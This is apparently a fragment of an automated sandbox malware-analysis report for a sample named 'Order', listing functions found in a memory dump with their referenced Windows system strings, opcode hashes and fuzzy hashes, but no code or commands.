                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: `$`
                                                                                                                                    • API String ID: 0-197956300
                                                                                                                                    • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                    • Instruction ID: 180b1c94abb03f8c75ec0fa4180756701f78bb89244d64de1a0699537963e1b6
                                                                                                                                    • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                    • Instruction Fuzzy Hash: 5DC19F312043429BE726CF28D841B6BBBE5AFC4318F188A2DF696CB2D1D775E505CB41
                                                                                                                                    Function 019BE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID: Legacy$UEFI
                                                                                                                                    • API String ID: 2994545307-634100481
                                                                                                                                    • Opcode ID: eb4f24a9d965fff5664d30e19d6d6498973192d3bd671297685d14d2b8f372ee
                                                                                                                                    • Instruction ID: bb6f964ab13ea882953204992d8b34d36bce3cdf00f6b4b0320768528f472ae5
                                                                                                                                    • Opcode Fuzzy Hash: eb4f24a9d965fff5664d30e19d6d6498973192d3bd671297685d14d2b8f372ee
                                                                                                                                    • Instruction Fuzzy Hash: 31614A71E006199FDB15DFA88980BEEBBB9FB48700F14846DE65DEB251D731A900CB51
                                                                                                                                    Function 019E43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: @$MUI
                                                                                                                                    • API String ID: 0-17815947
                                                                                                                                    • Opcode ID: a58d210a8a6d44cebb4879d6774a1bebf99a0837ce7a6ae34fcd639d43ad3fcf
                                                                                                                                    • Instruction ID: 50f052725fb6c43b7cd57cddc53e8e6ba7eb4d9fa1ca0af1d446dfe98565e9eb
                                                                                                                                    • Opcode Fuzzy Hash: a58d210a8a6d44cebb4879d6774a1bebf99a0837ce7a6ae34fcd639d43ad3fcf
                                                                                                                                    • Instruction Fuzzy Hash: 4851FA71E0021DAFDB11DFA9CC94EEEBBFDAB44754F100529E619F7250D6309905CB60
                                                                                                                                    Function 019404E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0194063D
                                                                                                                                    • kLsE, xrefs: 01940540
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                    • API String ID: 0-2547482624
                                                                                                                                    • Opcode ID: de6980fd6b573ae6bae69636033d253802a0de9e4d59f347e84b464e289fd580
                                                                                                                                    • Instruction ID: 765db01008f92531c76ce721210b54467943aa506b19d595a5163b53c24140df
                                                                                                                                    • Opcode Fuzzy Hash: de6980fd6b573ae6bae69636033d253802a0de9e4d59f347e84b464e289fd580
                                                                                                                                    • Instruction Fuzzy Hash: F351BB715047429BD724EF69C440AE7BBE8AF84305F18893EFAAE87241E770D545CB92
                                                                                                                                    Function 0194A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 0194A2FB
                                                                                                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 0194A309
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                    • API String ID: 0-2876891731
                                                                                                                                    • Opcode ID: 4625ee0ea3d634dfdc9046e30e63193ebfaad6979485085a9fbd2bd8bb97e31c
                                                                                                                                    • Instruction ID: 852fa0bb6b1a999bac4379e7027f4b7a6ecbc39595c516cf989a78bf9e18ab64
                                                                                                                                    • Opcode Fuzzy Hash: 4625ee0ea3d634dfdc9046e30e63193ebfaad6979485085a9fbd2bd8bb97e31c
                                                                                                                                    • Instruction Fuzzy Hash: 0241F330A44649CFEB25CF59C440F6DBBB8FF85701F144469E90ADB291E375D940CB80
                                                                                                                                    Function 0197A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID: Cleanup Group$Threadpool!
                                                                                                                                    • API String ID: 2994545307-4008356553
                                                                                                                                    • Opcode ID: 8f3647ad7bd6792a933649f69b4bc780993c57d2745ba5aaa5b742dccc039385
                                                                                                                                    • Instruction ID: 680078c1118b86c2f4c37fda896333582503475cffd3559a155fdbc543995b88
                                                                                                                                    • Opcode Fuzzy Hash: 8f3647ad7bd6792a933649f69b4bc780993c57d2745ba5aaa5b742dccc039385
                                                                                                                                    • Instruction Fuzzy Hash: B901ADB2240704AFE312DF14CD46B1A77E8EB85715F058939A64CC7190E334D904CB46
                                                                                                                                    Function 0194C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: MUI
                                                                                                                                    • API String ID: 0-1339004836
                                                                                                                                    • Opcode ID: 01dc49b3391694af2e6c011cef3b29f66b0b394779495b8e42bc3192d9f644eb
                                                                                                                                    • Instruction ID: 67fdc52ee4f838634fcceaf404442a340fdc86313b403f8134b771cf3d965220
                                                                                                                                    • Opcode Fuzzy Hash: 01dc49b3391694af2e6c011cef3b29f66b0b394779495b8e42bc3192d9f644eb
                                                                                                                                    • Instruction Fuzzy Hash: C8826A79E012198FEB25CFA9C880FEDBBB5BF48710F14816AE95DAB391D7309941CB50
                                                                                                                                    Function 019C6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 0-3916222277
                                                                                                                                    • Opcode ID: d611c8aceaed75a64578372bc8901b7574e1b7b47d110fb3aae5f483a69cbf7a
                                                                                                                                    • Instruction ID: 75abaf251f20eb36666d90271c551ce8a40683d00998c1d5fe02faec6f71f22d
                                                                                                                                    • Opcode Fuzzy Hash: d611c8aceaed75a64578372bc8901b7574e1b7b47d110fb3aae5f483a69cbf7a
                                                                                                                                    • Instruction Fuzzy Hash: D8918471900219AFEB21DF95CD85FAEBBB8EF54B50F100059F609BB291D774AD00CB61
                                                                                                                                    Function 019EE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 0-3916222277
                                                                                                                                    • Opcode ID: d7e09d08a35b523bb6621a01cca6c65cb7eef2043fef34c87154337291c9d085
                                                                                                                                    • Instruction ID: fcb7212772e7c38742724ad6eae1de7bac44871b43239b970c0ae98d70819a2a
                                                                                                                                    • Opcode Fuzzy Hash: d7e09d08a35b523bb6621a01cca6c65cb7eef2043fef34c87154337291c9d085
                                                                                                                                    • Instruction Fuzzy Hash: 85917E3190064ABADB23EFA5DC48FAFBBB9EF85740F140029F509A7250EB759905CB90
                                                                                                                                    Function 0197A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: GlobalTags
                                                                                                                                    • API String ID: 0-1106856819
                                                                                                                                    • Opcode ID: 8466b1f8c94f5da85aea04f69c640bd0a30f6e9707b20760bd698f502db40bcb
                                                                                                                                    • Instruction ID: de37f496e2b533ad34983d80104e5cf5b73a3cc631d1fce36db3482d960ddc18
                                                                                                                                    • Opcode Fuzzy Hash: 8466b1f8c94f5da85aea04f69c640bd0a30f6e9707b20760bd698f502db40bcb
                                                                                                                                    • Instruction Fuzzy Hash: 21715DB5E0021A9BDF28CF99C6D0AEDBBB5BF88711F14812EE509A7241E731A941CB50
                                                                                                                                    Function 019E4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: .mui
                                                                                                                                    • API String ID: 0-1199573805
                                                                                                                                    • Opcode ID: 44c10c1df654e9657501e164317d8493bc028db44cf4922b9d5ed02e9b610df4
                                                                                                                                    • Instruction ID: cc564d65daf1dc9d2f098b5fad0ca9c5b0689538ca7f6956d112df7bc5d5a841
                                                                                                                                    • Opcode Fuzzy Hash: 44c10c1df654e9657501e164317d8493bc028db44cf4922b9d5ed02e9b610df4
                                                                                                                                    • Instruction Fuzzy Hash: A4519472D0022A9BDF12DF99D848EAEBBF9BF44A50F054169E919FB300D7349901CBE4
                                                                                                                                    Function 0195E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: EXT-
                                                                                                                                    • API String ID: 0-1948896318
                                                                                                                                    • Opcode ID: 5e1b28b02f0d0f3afbcf3c0f30e8337a4e7e2d3a89b185714450945da0842c61
                                                                                                                                    • Instruction ID: c055e51af1b13b50793cc57f46c8f636de094e38ebb8192fea92d0a8f8f1fb94
                                                                                                                                    • Opcode Fuzzy Hash: 5e1b28b02f0d0f3afbcf3c0f30e8337a4e7e2d3a89b185714450945da0842c61
                                                                                                                                    • Instruction Fuzzy Hash: 55417F72508306ABD751DA75C880B6BFBECAFC8714F44092DBE8CE7140E675DA04C7A6
                                                                                                                                    Function 019BC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: BinaryHash
                                                                                                                                    • API String ID: 0-2202222882
                                                                                                                                    • Opcode ID: 8737962c1a74e0ea7285355010c4758a29c71cde96f7548e758458a674fbd968
                                                                                                                                    • Instruction ID: 52f8611b1648367e1d1c3de1b2901df017e1bda246ecfc5286e2bcacfedfb705
                                                                                                                                    • Opcode Fuzzy Hash: 8737962c1a74e0ea7285355010c4758a29c71cde96f7548e758458a674fbd968
                                                                                                                                    • Instruction Fuzzy Hash: 634151B1D0022DABDB21DB60CD84FDEB77CAB85714F0045A5EA0CAB140DB709E89CFA5
                                                                                                                                    Function 019D6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: #
                                                                                                                                    • API String ID: 0-1885708031
                                                                                                                                    • Opcode ID: dbe1d1cfddeda6bd96da4347615b69ecd08398cfe397d33d929debf84839edf7
                                                                                                                                    • Instruction ID: 7f4e40793478cbb4da1cd320ea9b6341bc849921ceb2e172ae4ae32843e63843
                                                                                                                                    • Opcode Fuzzy Hash: dbe1d1cfddeda6bd96da4347615b69ecd08398cfe397d33d929debf84839edf7
                                                                                                                                    • Instruction Fuzzy Hash: 76310731E007599BEB22DF79C854BEE7BBCDF54704F148028EA49AB282D775E805CB90
                                                                                                                                    Function 019C892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 019C895E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                    • API String ID: 0-702105204
                                                                                                                                    • Opcode ID: a6143daa9037824fb00545337c2c0be19444163ac662a3ac063e105b10e6c610
                                                                                                                                    • Instruction ID: e7944604a3352d37c1368974327f613640b1033d217c0b46dfd6afc2e270399c
                                                                                                                                    • Opcode Fuzzy Hash: a6143daa9037824fb00545337c2c0be19444163ac662a3ac063e105b10e6c610
                                                                                                                                    • Instruction Fuzzy Hash: 8F01F736600211ABE6209B999C85FD67B69FFC1F55F04041CF6CE16151CB30A841C797
                                                                                                                                    Function 019E2000 Relevance: .8, Instructions: 757COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e780f239e8c71864695559cd0bbcc45dfd32252a93c409cf3f184eabf967354a
                                                                                                                                    • Instruction ID: a1c7ffe2dfcfba477e07b0caa01e122de6f46ff68091b6b601257b5f34c78513
                                                                                                                                    • Opcode Fuzzy Hash: e780f239e8c71864695559cd0bbcc45dfd32252a93c409cf3f184eabf967354a
                                                                                                                                    • Instruction Fuzzy Hash: F842C4716083419BE726CF68C894A6FBBEDBFC8740F08092DFA8A97250D771D945CB52
                                                                                                                                    Function 019D8158 Relevance: .6, Instructions: 617COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c9e847adeed4f1aae8be9072c12012ff97c580dbc55fee2f314213df18e2c19e
                                                                                                                                    • Instruction ID: fe9d44f49ff56bc59288bb77c7159e1a1e3bd6725b49a1ced93e16aecff1b50b
                                                                                                                                    • Opcode Fuzzy Hash: c9e847adeed4f1aae8be9072c12012ff97c580dbc55fee2f314213df18e2c19e
                                                                                                                                    • Instruction Fuzzy Hash: 26426C75E002199FEB25CF69C841BADBBF9BF88311F15C099E94CAB242D7349985CF60
                                                                                                                                    Function 01952840 Relevance: .6, Instructions: 605COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e9967f26b15d5629f8c89b6b6a129d01affe66f3cdf69febacbfb988c8f5cdc5
                                                                                                                                    • Instruction ID: cfda5ae65dcf6d6d187767f2c2dc464f1ef0f64df09109ee0d2971f4e775467e
                                                                                                                                    • Opcode Fuzzy Hash: e9967f26b15d5629f8c89b6b6a129d01affe66f3cdf69febacbfb988c8f5cdc5
                                                                                                                                    • Instruction Fuzzy Hash: 5E320F70A007458FEB25CF69C854BBEBBFABF84704F58451DD58E9B284D735A80ACB90
                                                                                                                                    Function 019EA118 Relevance: .6, Instructions: 591COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2be694063cc049cbcec77641937ccd3bf31e261acafbaecee39edbb28327cf7f
                                                                                                                                    • Instruction ID: 57ae6b6e5edae3c01e1275b86a30a9455e025a7e2d2ce759261875deb06dabb4
                                                                                                                                    • Opcode Fuzzy Hash: 2be694063cc049cbcec77641937ccd3bf31e261acafbaecee39edbb28327cf7f
                                                                                                                                    • Instruction Fuzzy Hash: F722F4746046618FEB26CF2DC098776BBF5BF45701F088859E98E8F2A6E735D442CB60
                                                                                                                                    Function 01946A50 Relevance: .5, Instructions: 548COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 3dfae7215a06350b05984504a7a9945a3ae0c6786f36f4dd603e08ff6ee10701
                                                                                                                                    • Instruction ID: 1e85c6699058995a8f7fd272d40c2abba240b7a372e3f36ac99da54bd69b612b
                                                                                                                                    • Opcode Fuzzy Hash: 3dfae7215a06350b05984504a7a9945a3ae0c6786f36f4dd603e08ff6ee10701
                                                                                                                                    • Instruction Fuzzy Hash: 5832AFB1A04605CFDB25CF68C880FAABBF5FF49301F148969E959AB351D734E845CB90
                                                                                                                                    Function 01964A35 Relevance: .4, Instructions: 423COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                    • Instruction ID: 595ce7ee7d12423a0485f9ed7113efa8d81932311647a1d0f65bcf704d227a94
                                                                                                                                    • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                    • Instruction Fuzzy Hash: 70F17171E0021A9BDB15CFE9C590BAEBBFDBF48714F058129E909AB344D774E841CBA0
                                                                                                                                    Function 019D892B Relevance: .4, Instructions: 386COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 564947956cf769c83eb25f494805f5f2be397b56b71cdbf018cc65ceeb4d7a10
                                                                                                                                    • Instruction ID: e647de04a17dc4520849babe3de0bbd29691871cf6e364c5955c4170b8810767
                                                                                                                                    • Opcode Fuzzy Hash: 564947956cf769c83eb25f494805f5f2be397b56b71cdbf018cc65ceeb4d7a10
                                                                                                                                    • Instruction Fuzzy Hash: E3D10171E0060A9BDF05CFA9C841BFEB7F5AF88304F18C569D959A7282D739E905CB60
                                                                                                                                    Function 019465D0 Relevance: .4, Instructions: 383COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: dd359475b996b2a7437e90d028d774ad9587a2e626928481ce97bccad9fe5c4d
                                                                                                                                    • Instruction ID: 4358bff50db001bce2efa8e541fcd104c44426b6b46614b5bfd4c1862399cad5
                                                                                                                                    • Opcode Fuzzy Hash: dd359475b996b2a7437e90d028d774ad9587a2e626928481ce97bccad9fe5c4d
                                                                                                                                    • Instruction Fuzzy Hash: 99E180B5508342CFC715CF28C490E6ABBE4FF8A314F058A6DE99997351E731E909CB92
                                                                                                                                    Function 01938397 Relevance: .4, Instructions: 380COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 21b573f9cbf45a0706ea6d876337b34945fe7ebd1d04f62c8497d8a2f3d0d164
                                                                                                                                    • Instruction ID: 555d475535a76c378973ad75d59689be8f9a4a1f4fc4372273864ba3a0fbbfb6
                                                                                                                                    • Opcode Fuzzy Hash: 21b573f9cbf45a0706ea6d876337b34945fe7ebd1d04f62c8497d8a2f3d0d164
                                                                                                                                    • Instruction Fuzzy Hash: 27D1CF71A0020A9BDF15DF68D880EBA77AABFD4714F04462DF91EDB280E734E951CB90
                                                                                                                                    Function 019C8243 Relevance: .3, Instructions: 322COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                    • Instruction ID: 2e828ba19048224094df60e63efb4c9f180ac0fcc4ca02e76e3981af6420e96f
                                                                                                                                    • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                    • Instruction Fuzzy Hash: A4B1C874A00605AFEF24DF58C944EAFBBBAFF84744F10445EAA8A97790DB34E905CB11
                                                                                                                                    Function 01950535 Relevance: .3, Instructions: 300COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                    • Instruction ID: 7ef28e772b8ed3b026bfada8b9858ecd2fea0133130b8b87026507ce7d6e2935
                                                                                                                                    • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                    • Instruction Fuzzy Hash: 6CB10731700646AFDB15DB68C850BBEBBFAAF84304F180569EA5EA7281D770ED45CB90
                                                                                                                                    Function 019483C0 Relevance: .3, Instructions: 281COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f448ee58883faccb3d7525465a29df4e36f3553d0d7a3e861f8a7cd347ae8d15
                                                                                                                                    • Instruction ID: 3a0f0f52b244e047edf551d41f291ac04884ebba6ebb72bf4765c4910ddb7bb2
                                                                                                                                    • Opcode Fuzzy Hash: f448ee58883faccb3d7525465a29df4e36f3553d0d7a3e861f8a7cd347ae8d15
                                                                                                                                    • Instruction Fuzzy Hash: 12C16774608381CFE764CF59C484BABB7E9BF88704F44496DE98987291E774E908CF92
                                                                                                                                    Function 0193C427 Relevance: .3, Instructions: 280COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
